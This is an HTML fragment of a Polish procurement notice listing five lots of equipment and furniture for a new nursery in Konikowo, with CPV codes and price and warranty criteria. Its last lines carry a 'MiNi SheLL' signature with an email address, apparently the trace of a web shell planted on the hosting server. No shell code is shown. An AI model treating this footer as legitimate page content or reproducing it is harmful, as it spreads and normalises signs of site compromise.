przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Wyposażenie łazienek</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa wyposażenia do łazienek wraz z montażem:1. Zakup wyposażenia łazienek z montażem- Dozownik na papier - 4 szt.2. Zakup wyposażenia łazienek z montażem- Dozownik mydła w płynie - 6 szt. 3. Zakup wyposażenia łazienek z montażem- Dozownik na ręczniki papierowe - 6 szt.4. Zakup wyposażenia łazienek z montażem- Kosz na śmieci z ruchomą pokrywką - 6 szt. 5. Zakup wyposażenia łazienek z montażem- kosz na śmieci - zwierzątko - 3 szt. 6. Zakup wyposażenia łazienek z montażem- kosz na pieluchy - 1 szt.7. Zakup wyposażenia łazienek z montażem- lustro - 4 szt. 8. Zakup wyposażenia łazienek z montażem- szczotka toaletowa - 4 szt. Szczegółowy opis przedmiotu zamówienia został określony w SIWZ oraz w załączniku nr 1 do niniejszej specyfikacji, który należy załączyć do oferty po uzupełnieniu przez Wykonawcę cen (w zależności od części zamówienia, której dotyczy oferta).Przedmiot zamówienia obejmuje również montaż całego wyposażenia. Wraz z dostawą Wykonawca ma obowiązek przekazania Zamawiającemu komplety atestów, certyfikatów i kart gwarancyjnych, skompletowanych w dwóch 2 egz. (oryginały i kopie). Wykonawca ma obowiązek wykonywania montażu w uzgodnieniu z wykonawcą zadania pn.: ,,Budowa żłobka w miejscowości Konikowo". <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 44410000-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td> Część 2. Wyposażenie pomieszczeń (sale zabaw, sypialnie, magazynek, pokój dyrekcji, pokój higienistki, pom. socjalne, jadalnia, szatnia)</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa wyposażenia do pomieszczeń (sale zabaw, sypialnie, magazynek, pokój dyrekcji, pokój higienistki, pom. socjalne, jadalnia, szatnia) wraz z montażem:1. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) z montażem - stoliki - 6 szt. 2. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - krzesło z siedziskiem - 16 szt. 3. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - krzesło z siedziskiem - 8 szt. 4. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał wysoki - 1 szt. 5. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - krzesło z pełnym oparciem - 2 szt.6. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał - 2 szt.7. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał - 1 szt. 8. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) -regał - 1 szt. 9. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał wysoki - 2 szt. 10. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - biurko - 2 szt. 11. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - regał ścienny - 2 szt. 12. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - szafa - 2 szt.13. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - namiot - 1 szt. 14. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - dekoracje ścienne - 1 szt.15. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - tabliczki w kształcie zwierzątek - 1 szt. 16. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - ścianka manipulacyjna - 2 szt. 17. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik na kółkach min. 45 l - 3 szt.18. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - skrzynia na kółkach min. 70 l - 2 szt.19. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik na kółkach min. 29 l - 3 szt.20. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik do przechowywania zabawek min. 12 l - 8 szt.21. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - pojemnik do przechowywania zabawek min. 30 l - 4 szt.22. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - półko-przewijak - 1 komplet23. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - tablica korkowa - 6 szt.24. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - mata piankowa - zadaniowa - 2 komplety25. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Leżaczek dla dzieci od urodzenia do 18 kg - 5 szt. 26. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Dywan do w rozmiarze 3.00 x 4.00 m - niebieski ocean - 3 szt.27. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Dywan do w rozmiarze 3.00x4.00 m - zielony 2 szt.28. Zakup wyposażenia pomieszczeń z montażem (sale zabaw) - Ochrona na ściany narożne i narożniki - 4 szt. 29. Zakup wyposażenia pomieszczeń z montażem (jadalnia) - ławeczka do karmienia - 1 szt. 30. Zakup wyposażenia pomieszczeń z montażem (jadalnia) - Stół prostokątny regulowany - 8 szt.31. Zakup wyposażenia pomieszczeń z montażem (jadalnia) - Krzesło z siedziskiem i oparciem, Wysokość siedziska 31 cm - 20 szt.32. Zakup wyposażenia pomieszczeń z montażem (jadalnia) -Krzesło z siedziskiem i oparciem, Wysokość siedziska 26 cm - 12 szt.33. Zakup wyposażenia pomieszczeń z montażem (jadalnia) -Kredens na kółkach - biały - 2 szt. 34. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Tablica Magnetyczna - 2 szt.35. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Pojemniki do segregacji odpadów - 1 kpl.36. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Mata wejściowa 1 - 1 szt. 37. Zakup wyposażenia pomieszczeń z montażem(przedsionka/komunikacji z montażem) - Mata wejściowa 2 - 1 szt. 38. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - dziecięcy leżaczek - 5 szt.39. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Łóżeczko dla niemowlaka - 2 szt.40. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Materac do łóżeczka niemowlęcego - 2 szt. 41. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Pokrowiec na leżaczki - 3 szt.42. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Łóżeczko jasnoniebieskie - 24 szt.43. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Łóżeczko żółte (leżaczek) - 24 szt.44. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Materace bawełniane - kolor niebieski - 24 szt.45. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Materace bawełniane - kolor żółty - 24 szt.46. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Metalowa konstrukcja pozwalająca na łatwe przemieszczanie łóżeczek - 3 szt. 47. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Szafa na pościel i 8 materacy - 6 szt. 48. Zakup wyposażenia pomieszczeń z montażem (sypialnie) - Biblioteczka - 2 szt.49. Zakup wyposażenia pomieszczeń z montażem (sypialnia) - Fotel - 2 szt.50. Zakup wyposażenia pomieszczeń z montażem(szatnia) - Wieszak podwójny - 48 szt.51. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Wieszak na ubrania - 3 szt. 52. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Szafki do szatni - 48 szt. 53. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Siedzisko - 2 szt.54. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Aluminiowa rama zatrzaskowa - 6 szt.55. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Kosz na śmieci - 1 szt.56. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Ławka tapicerowana - 1 szt.57. Zakup wyposażenia pomieszczeń z montażem (szatnia) - Przewijak wolnostojący - 1 szt. 58. Zakup wyposażenia pomieszczeń z montażem (pom. socjalne) - zamykana szafka - 5 szt.59. Zakup wyposażenia pomieszczeń z montażem (pom. socjalne) - krzesła - 4 szt.60. Zakup wyposażenia pomieszczeń z montażem (pom. socjalne) - stolik okrągły - 1 szt.61. Zakup wyposażenia pomieszczeń z montażem (magazynek) - regał 1 - 1 szt.62. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - regał 2 - 1 szt. 63. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - kozetka - 1 szt.64. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - szafa na cokole - 1 szt.65. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - szafa 2-drzwiowa - 1 szt.66. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - biurko - 1 szt.67. Zakup wyposażenia pomieszczeń z montażem (pokój higienistki) - krzesło - 1 szt.68. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - krzesło - 1 szt.69. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - biurko narożne 1 szt. 70. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - szafa ubraniowa biurowa duża - 1 szt. 71. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - szafa biurowa regał z półkami - 1 szt.72. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - szafa biurowa niska - 1 szt. 73. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - regał biurowy 1 - 1 szt. 74. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - regał biurowy 2 - 1 szt.75. Zakup wyposażenia pomieszczeń (pokój dyrekcji) - szafka biurowa - 1 szt.76. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - stolik biurowy okrągły - 1 szt.77. Zakup wyposażenia pomieszczeń z montażem (pokój dyrekcji) - białe krzesło biurowe - 2 szt.Szczegółowy opis przedmiotu zamówienia został określony w SIWZ oraz załączniku nr 1 do niniejszej specyfikacji, który należy załączyć do oferty po uzupełnieniu przez Wykonawcę cen (w zależności od części zamówienia, której dotyczy oferta).Przedmiot zamówienia obejmuje również montaż całego wyposażenia. Wraz z dostawą Wykonawca ma obowiązek przekazania Zamawiającemu komplety atestów, certyfikatów i kart gwarancyjnych, skompletowanych w dwóch 2 egz. (oryginały i kopie). Wykonawca ma obowiązek wykonywania montażu w uzgodnieniu z wykonawcą zadania pn.: ,,Budowa żłobka w miejscowości Konikowo". <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 39161000-8, 39130000-2, 39140000-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Wyposażenie zaplecza kuchennego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa wyposażenia do zaplecza kuchennego wraz z montażem:1. Wózek 3-półkowy - 1 szt.2. Wózek 2-półkowy - 1 szt.3. Podgrzewacz do posiłków - 1 szt.4. Lodówka - 1 szt.Szczegółowy opis przedmiotu zamówienia został określony w SIWZ oraz załączniku nr 1 do niniejszej specyfikacji, który należy załączyć do oferty po uzupełnieniu przez Wykonawcę cen (w zależności od części zamówienia, której dotyczy oferta).Przedmiot zamówienia obejmuje również montaż całego wyposażenia. Wraz z dostawą Wykonawca ma obowiązek przekazania Zamawiającemu komplety atestów, certyfikatów i kart gwarancyjnych, skompletowanych w dwóch 2 egz. (oryginały i kopie). Wykonawca ma obowiązek wykonywania montażu w uzgodnieniu z wykonawcą zadania pn.: ,,Budowa żłobka w miejscowości Konikowo". <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 39710000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Pozostałe wyposażenie </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa pozostałego wyposażenia wraz z montażem:1. Pozostałe wyposażenie - lampa bakteriobójcza - 2 szt. 2. Pozostałe wyposażenie - wózek 6-osobowy - 1 komplet3. Pozostałe wyposażenie -wózek 4-osobowy - 1 komplet4. Pozostałe wyposażenie - parawan żłobkowy narożny - 1 kompletSzczegółowy opis przedmiotu zamówienia został określony w SIWZ oraz załączniku nr 1 do niniejszej specyfikacji, który należy załączyć do oferty po uzupełnieniu przez Wykonawcę cen (w zależności od części zamówienia, której dotyczy oferta).Przedmiot zamówienia obejmuje również montaż całego wyposażenia. Wraz z dostawą Wykonawca ma obowiązek przekazania Zamawiającemu komplety atestów, certyfikatów i kart gwarancyjnych, skompletowanych w dwóch 2 egz. (oryginały i kopie). Wykonawca ma obowiązek wykonywania montażu w uzgodnieniu z wykonawcą zadania pn.: ,,Budowa żłobka w miejscowości Konikowo". <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 31515000-9, 34911100-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Dostawa sprzętu komputerowego, multimedialnego i elektronicznego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa sprzętu komputerowego, multimedialnego i elektronicznego wraz z montażem:1. Urządzenie Wielofunkcyjne - 1 komplet2. Drukarka laserowa - 1 komplet3. Laptop - 2 komplety4. Zestaw nagłaśniający - 1 komplet5. Zestaw multimedialny - 1 kompletSzczegółowy opis przedmiotu zamówienia został określony w SWIZ oraz załączniku nr 1 do niniejszej specyfikacji, który należy załączyć do oferty po uzupełnieniu przez Wykonawcę cen (w zależności od części zamówienia, której dotyczy oferta).Przedmiot zamówienia obejmuje również montaż całego wyposażenia. Wraz z dostawą Wykonawca ma obowiązek przekazania Zamawiającemu komplety atestów, certyfikatów i kart gwarancyjnych, skompletowanych w dwóch 2 egz. (oryginały i kopie). Wykonawca ma obowiązek wykonywania montażu w uzgodnieniu z wykonawcą zadania pn.: ,,Budowa żłobka w miejscowości Konikowo". <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>32000000-3, 30200000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-08-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com